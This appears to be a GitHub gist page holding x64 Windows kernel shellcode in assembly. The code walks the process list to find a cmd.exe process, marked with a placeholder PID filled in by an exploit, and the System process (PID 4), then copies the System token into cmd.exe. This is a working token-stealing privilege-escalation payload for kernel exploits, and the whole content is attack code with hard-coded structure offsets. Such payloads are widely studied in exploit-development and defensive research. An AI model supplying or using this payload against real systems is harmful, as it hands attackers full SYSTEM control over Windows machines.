-
-
Save xpn/8f993b3c4cca474d8ebe553f0e36a3e0 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[BITS 64] | |
push rax | |
push rbx | |
push rcx | |
push rsi | |
push rdi | |
mov rax, [gs:0x180 + 0x8] ; Get 'CurrentThread' from KPRCB | |
mov rax, [rax + 0x220] ; Get 'Process' property from current thread | |
next_process: | |
cmp dword [rax + 0x2e0], 0x41414141 ; Search for 'cmd.exe' process ('AAAA' replaced by exploit) | |
je found_cmd_process | |
mov rax, [rax + 0x2e8] ; If not found, go to next process | |
sub rax, 0x2e8 | |
jmp next_process | |
found_cmd_process: | |
mov rbx, rax ; Save our cmd.exe EPROCESS for later | |
find_system_process: | |
cmp dword [rax + 0x2e0], 0x00000004 ; Search for PID 4 (System process) | |
je found_system_process | |
mov rax, [rax + 0x2e8] | |
sub rax, 0x2e8 | |
jmp find_system_process | |
found_system_process: | |
mov rcx, [rax + 0x358] ; Take TOKEN from System process | |
mov [rbx+0x358], rcx ; And copy it to the cmd.exe process | |
pop rdi | |
pop rsi | |
pop rcx | |
pop rbx | |
pop rax | |
; return goes here |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment